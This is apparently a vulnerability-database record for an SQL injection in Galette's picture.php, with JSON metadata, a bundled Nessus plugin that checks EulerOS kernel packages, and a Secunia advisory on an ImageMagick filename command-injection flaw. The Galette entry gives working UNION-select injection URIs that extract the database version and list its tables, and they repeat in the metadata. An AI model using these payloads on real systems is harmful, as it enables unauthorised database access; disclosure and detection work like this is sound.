ID 1337DAY-ID-18261 Type zdt Reporter Sofian Brabez Modified 2012-05-13T00:00:00
Description
Exploit for php platform in category web applications
Source: http://www.securityfocus.com/bid/53463/info
Galette is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Versions prior to Galette 0.7.x are vulnerable.
Attackers can use a browser to exploit this issue.
The following example URIs are available.
http://server/[email protected]@version,null
http://server/picture.php?id_adh=0+and+1=0+union+select+group_concat(table_name,char(10)),null+from+information_schema.tables
# 0day.today [2018-02-15] #
{"published": "2012-05-13T00:00:00", "id": "1337DAY-ID-18261", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T02:23:41", "bulletin": {"published": "2012-05-13T00:00:00", "id": "1337DAY-ID-18261", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 3.6, "modified": "2016-04-20T02:23:41"}}, "hash": "9c6aff635ba649b6ff911249660b8ffab2985d3ed4dcac26d1ce9ce4cd1552d4", "description": "Exploit for php platform in category web applications", "type": "zdt", "lastseen": "2016-04-20T02:23:41", "edition": 1, "title": "Galette (picture.php) SQL Injection Vulnerability", "href": "http://0day.today/exploit/description/18261", "modified": "2012-05-13T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/18261", "references": [], "reporter": "Sofian Brabez", "sourceData": "Source: http://www.securityfocus.com/bid/53463/info\r\n \r\nGalette is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.\r\n \r\nExploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.\r\n \r\nVersions prior to Galette 0.7.x are vulnerable.\r\n \r\nAttackers can use a browser to exploit this issue.\r\n \r\nThe following example URIs are available.\r\n \r\nhttp://server/picture.php?id_adh=0+and+1=0+union+select+@@version,null\r\n \r\nhttp://server/picture.php?id_adh=0+and+1=0+union+select+group_concat(table_name,char(10)),null+from+information_schema.tables\r\n\r\n\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "1e8ac2c9cf22a0dd889513ad692bd812", "key": "reporter"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "c0b483b1ef2cadddcf43c7e3f62ed4bf", "key": "sourceHref"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "abae37fe0a42c3f9280ea3b0751db9de", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "dba09efb295c80f9a91a040bdbb62d55", "key": "title"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "14748d74c62a742ddda9a1f39f57b8b5", "key": "sourceData"}, {"hash": "5a3be5e1d052b2a38da4280278e78b00", "key": "modified"}, {"hash": "5a3be5e1d052b2a38da4280278e78b00", "key": "published"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}], "objectVersion": "1.0"}}], "description": "Exploit for php platform in category web applications", "hash": "5096e7dd8784fe8e3baab78a7bf056e7c8c6c3a9f100ed668182d741bbf427c5", "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2018-02-15T19:10:24"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:10856"]}], "modified": "2018-02-15T19:10:24"}, "vulnersScore": 0.2}, "type": "zdt", "lastseen": "2018-02-15T19:10:24", "edition": 2, "title": "Galette (picture.php) SQL Injection Vulnerability", "href": "https://0day.today/exploit/description/18261", "modified": "2012-05-13T00:00:00", "bulletinFamily": "exploit", "viewCount": 2, "cvelist": [], "sourceHref": "https://0day.today/exploit/18261", "references": [], "reporter": "Sofian Brabez", "sourceData": "Source: http://www.securityfocus.com/bid/53463/info\r\n \r\nGalette is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.\r\n \r\nExploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.\r\n \r\nVersions prior to Galette 0.7.x are vulnerable.\r\n \r\nAttackers can use a browser to exploit this issue.\r\n \r\nThe following example URIs are available.\r\n \r\nhttp://server/[email\u00a0protected]@version,null\r\n \r\nhttp://server/picture.php?id_adh=0+and+1=0+union+select+group_concat(table_name,char(10)),null+from+information_schema.tables\r\n\r\n\n\n# 0day.today [2018-02-15] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "b124d196ec49e59f5dbae9542e8cc27b", "key": "href"}, {"hash": "5a3be5e1d052b2a38da4280278e78b00", "key": "modified"}, {"hash": "5a3be5e1d052b2a38da4280278e78b00", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "1e8ac2c9cf22a0dd889513ad692bd812", "key": "reporter"}, {"hash": "8479d8983e98d3d0ce9213b39363f826", "key": "sourceData"}, {"hash": "6a35f2e510a2a23c5b464e99121d8f0c", "key": "sourceHref"}, {"hash": "dba09efb295c80f9a91a040bdbb62d55", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"nessus": [{"lastseen": "2019-11-01T02:07:07", "bulletinFamily": "scanner", "description": "According to the versions of the kernel packages installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - Array index error in the tcm_vhost_make_tpg function in\n drivers/vhost/scsi.c in the Linux kernel before 4.0\n might allow guest OS users to cause a denial of service\n (memory corruption) or possibly have unspecified other\n impact via a crafted VHOST_SCSI_SET_ENDPOINT ioctl\n call. NOTE: the affected function was renamed to\n vhost_scsi_make_tpg before the vulnerability was\n announced.(CVE-2015-4036)\n\n - The llc_cmsg_rcv function in net/llc/af_llc.c in the\n Linux kernel before 4.5.5 does not initialize a certain\n data structure, which allows attackers to obtain\n sensitive information from kernel stack memory by\n reading a message.(CVE-2016-4485)\n\n - The nr_recvmsg function in net/netrom/af_netrom.c in\n the Linux kernel before 3.12.4 updates a certain length\n value without ensuring that an associated data\n structure has been initialized, which allows local\n users to obtain sensitive information from kernel\n memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg\n system call.(CVE-2013-7269)\n\n - The mct_u232_msr_to_state function in\n drivers/usb/serial/mct_u232.c in the Linux kernel\n before 4.5.1 allows physically proximate attackers to\n cause a denial of service (NULL pointer dereference and\n system crash) via a crafted USB device without two\n interrupt-in endpoint descriptors.(CVE-2016-3136)\n\n - An out-of-bounds memory access flaw, CVE-2014-7825, was\n found in the syscall tracing functionality of the Linux\n kernel", "modified": "2019-11-02T00:00:00", "id": "EULEROS_SA-2019-1520.NASL", "href": "https://www.tenable.com/plugins/nessus/124973", "published": "2019-05-14T00:00:00", "title": "EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1520)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(124973);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/06/27 13:33:26\");\n\n script_cve_id(\n \"CVE-2013-7269\",\n \"CVE-2014-2309\",\n \"CVE-2014-3647\",\n \"CVE-2014-7826\",\n \"CVE-2015-2922\",\n \"CVE-2015-4036\",\n \"CVE-2015-7550\",\n \"CVE-2016-3136\",\n \"CVE-2016-4482\",\n \"CVE-2016-4485\",\n \"CVE-2016-8630\",\n \"CVE-2016-8646\",\n \"CVE-2017-18221\",\n \"CVE-2017-18261\",\n \"CVE-2017-7294\",\n \"CVE-2018-10881\",\n \"CVE-2018-1120\",\n \"CVE-2018-13099\",\n \"CVE-2018-14612\",\n \"CVE-2018-20784\"\n );\n script_bugtraq_id(\n 64742,\n 66095,\n 70748,\n 70971,\n 74315,\n 74664\n );\n\n script_name(english:\"EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1520)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization for ARM 64 host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - Array index error in the tcm_vhost_make_tpg function in\n drivers/vhost/scsi.c in the Linux kernel before 4.0\n might allow guest OS users to cause a denial of service\n (memory corruption) or possibly have unspecified other\n impact via a crafted VHOST_SCSI_SET_ENDPOINT ioctl\n call. NOTE: the affected function was renamed to\n vhost_scsi_make_tpg before the vulnerability was\n announced.(CVE-2015-4036)\n\n - The llc_cmsg_rcv function in net/llc/af_llc.c in the\n Linux kernel before 4.5.5 does not initialize a certain\n data structure, which allows attackers to obtain\n sensitive information from kernel stack memory by\n reading a message.(CVE-2016-4485)\n\n - The nr_recvmsg function in net/netrom/af_netrom.c in\n the Linux kernel before 3.12.4 updates a certain length\n value without ensuring that an associated data\n structure has been initialized, which allows local\n users to obtain sensitive information from kernel\n memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg\n system call.(CVE-2013-7269)\n\n - The mct_u232_msr_to_state function in\n drivers/usb/serial/mct_u232.c in the Linux kernel\n before 4.5.1 allows physically proximate attackers to\n cause a denial of service (NULL pointer dereference and\n system crash) via a crafted USB device without two\n interrupt-in endpoint descriptors.(CVE-2016-3136)\n\n - An out-of-bounds memory access flaw, CVE-2014-7825, was\n found in the syscall tracing functionality of the Linux\n kernel's perf subsystem. A local, unprivileged user\n could use this flaw to crash the system. Additionally,\n an out-of-bounds memory access flaw, CVE-2014-7826, was\n found in the syscall tracing functionality of the Linux\n kernel's ftrace subsystem. On a system with ftrace\n syscall tracing enabled, a local, unprivileged user\n could use this flaw to crash the system, or escalate\n their privileges.(CVE-2014-7826)\n\n - Linux kernel built with the Kernel-based Virtual\n Machine (CONFIG_KVM) support is vulnerable to a null\n pointer dereference flaw. It could occur on x86\n platform, when emulating an undefined instruction. An\n attacker could use this flaw to crash the host kernel\n resulting in DoS.(CVE-2016-8630)\n\n - A flaw was found in the Linux kernel's ext4 filesystem.\n A local user can cause an out-of-bound access in\n ext4_get_group_info function, a denial of service, and\n a system crash by mounting and operating on a crafted\n ext4 filesystem image.(CVE-2018-10881)\n\n - The arch_timer_reg_read_stable macro in\n arch/arm64/include/asm/arch_timer.h in the Linux kernel\n before 4.13 allows local users to cause a denial of\n service (infinite recursion) by writing to a file under\n /sys/kernel/debug in certain circumstances, as\n demonstrated by a scenario involving debugfs, ftrace,\n PREEMPT_TRACER, and\n FUNCTION_GRAPH_TRACER.(CVE-2017-18261)\n\n - The ip6_route_add function in net/ipv6/route.c in the\n Linux kernel through 3.13.6 does not properly count the\n addition of routes, which allows remote attackers to\n cause a denial of service (memory consumption) via a\n flood of ICMPv6 Router Advertisement\n packets.(CVE-2014-2309)\n\n - In the Linux kernel before 4.20.2, kernel/sched/fair.c\n mishandles leaf cfs_rq's, which allows attackers to\n cause a denial of service (infinite loop in\n update_blocked_averages) or possibly have unspecified\n other impact by inducing a high load.(CVE-2018-20784)\n\n - An issue was discovered in the F2FS filesystem code in\n fs/f2fs/inline.c in the Linux kernel. A denial of\n service due to the out-of-bounds memory access can\n occur for a modified f2fs filesystem\n image.(CVE-2018-13099)\n\n - An out-of-bounds write vulnerability was found in the\n Linux kernel's vmw_surface_define_ioctl() function, in\n the 'drivers/gpu/drm/vmwgfx/vmwgfx_surface.c' file. Due\n to the nature of the flaw, privilege escalation cannot\n be fully ruled out, although we believe it is\n unlikely.(CVE-2017-7294)\n\n - A flaw was found in the way the Linux kernel's KVM\n subsystem handled non-canonical addresses when\n emulating instructions that change the RIP (for\n example, branches or calls). A guest user with access\n to an I/O or MMIO region could use this flaw to crash\n the guest.(CVE-2014-3647)\n\n - The __munlock_pagevec function in mm/mlock.c in the\n Linux kernel, before 4.11.4, allows local users to\n cause a denial of service (NR_MLOCK accounting\n corruption) via crafted use of mlockall and munlockall\n system calls.(CVE-2017-18221)\n\n - ** RESERVED ** This candidate has been reserved by an\n organization or individual that will use it when\n announcing a new security problem. When the candidate\n has been publicized, the details for this candidate\n will be provided.(CVE-2018-1120)\n\n - The proc_connectinfo() function in\n 'drivers/usb/core/devio.c' in the Linux kernel through\n 4.6 does not initialize a certain data structure, which\n allows local users to obtain sensitive information from\n kernel stack memory via a crafted USBDEVFS_CONNECTINFO\n ioctl call. The stack object 'ci' has a total size of 8\n bytes. Its last 3 bytes are padding bytes which are not\n initialized and are leaked to userland.(CVE-2016-4482)\n\n - A vulnerability was found in the Linux kernel. An\n unprivileged local user could trigger oops in\n shash_async_export() by attempting to force the\n in-kernel hashing algorithms into decrypting an empty\n data set.(CVE-2016-8646)\n\n - An issue was discovered in the btrfs filesystem code in\n the Linux kernel. An invalid NULL pointer dereference\n in btrfs_root_node() when mounting a crafted btrfs\n image is due to a lack of chunk block group mapping\n validation in btrfs_read_block_groups() in the\n fs/btrfs/extent-tree.c function and a lack of\n empty-tree checks in check_leaf() in\n fs/btrfs/tree-checker.c function. This could lead to a\n system crash and a denial of service.(CVE-2018-14612)\n\n - It was found that the Linux kernel's TCP/IP protocol\n suite implementation for IPv6 allowed the Hop Limit\n value to be set to a smaller value than the default\n one. An attacker on a local network could use this flaw\n to prevent systems on that network from sending or\n receiving network packets.(CVE-2015-2922)\n\n - A NULL-pointer dereference flaw was found in the\n kernel, which is caused by a race between revoking a\n user-type key and reading from it. The issue could be\n triggered by an unprivileged user with a local account,\n causing the kernel to crash (denial of\n service).(CVE-2015-7550)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1520\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f904a7a8\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-4.19.28-1.2.117\",\n \"kernel-devel-4.19.28-1.2.117\",\n \"kernel-headers-4.19.28-1.2.117\",\n \"kernel-tools-4.19.28-1.2.117\",\n \"kernel-tools-libs-4.19.28-1.2.117\",\n \"kernel-tools-libs-devel-4.19.28-1.2.117\",\n \"perf-4.19.28-1.2.117\",\n \"python-perf-4.19.28-1.2.117\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:15", "bulletinFamily": "software", "description": "\r\nTITLE:\r\nImageMagick Utilities Image Filename Shell Command Injection\r\n\r\nSECUNIA ADVISORY ID:\r\nSA18261\r\n\r\nVERIFY ADVISORY:\r\nhttp://secunia.com/advisories/18261/\r\n\r\nCRITICAL:\r\nModerately critical\r\n\r\nIMPACT:\r\nSystem access\r\n\r\nWHERE:\r\n>From remote\r\n\r\nSOFTWARE:\r\nImageMagick 6.x\r\nhttp://secunia.com/product/3763/\r\n\r\nDESCRIPTION:\r\nFlorian Weimer has discovered a vulnerability in ImageMagick, which\r\npotentially can be exploited by malicious people to compromise a\r\nuser's system.\r\n\r\nThe vulnerability is caused due to an error in the delegate code used\r\nby various ImageMagick utilities (e.g. display, identify) when\r\nhandling an image filename. This can be exploited to execute\r\narbitrary commands when an image file with a filename containing\r\nshell command is opened either via the command line or from the file\r\nopen dialog box.\r\n\r\nSuccessful exploitation requires that the user is e.g. tricked into\r\ndownloading and saving an image file with a specially crafted\r\nfilename and opening it.\r\n\r\nThe vulnerability has been confirmed in version 6.2.5 compiled from\r\nsource (with default options). Other versions may also be affected.\r\n\r\nSOLUTION:\r\nDo not open image files with suspicious looking filenames.\r\n\r\nPROVIDED AND/OR DISCOVERED BY:\r\nFlorian Weimer\r\n\r\nORIGINAL ADVISORY:\r\nDebian:\r\nhttp://bugs.debian.org/cgi-bin/bugreport.cgi?bug=345238\r\n\r\n----------------------------------------------------------------------\r\n\r\nAbout:\r\nThis Advisory was delivered by Secunia as a free service to help\r\neverybody keeping their systems up to date against the latest\r\nvulnerabilities.\r\n\r\nSubscribe:\r\nhttp://secunia.com/secunia_security_advisories/\r\n\r\nDefinitions: (Criticality, Where etc.)\r\nhttp://secunia.com/about_secunia_advisories/\r\n\r\n\r\nPlease Note:\r\nSecunia recommends that you verify all advisories you receive by\r\nclicking the link.\r\nSecunia NEVER sends attached files with advisories.\r\nSecunia does not advise people to install third party patches, only\r\nuse those supplied by the vendor.\r\n", "modified": "2005-12-30T00:00:00", "published": "2005-12-30T00:00:00", "id": "SECURITYVULNS:DOC:10856", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:10856", "title": "[SA18261] ImageMagick Utilities Image Filename Shell Command Injection", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}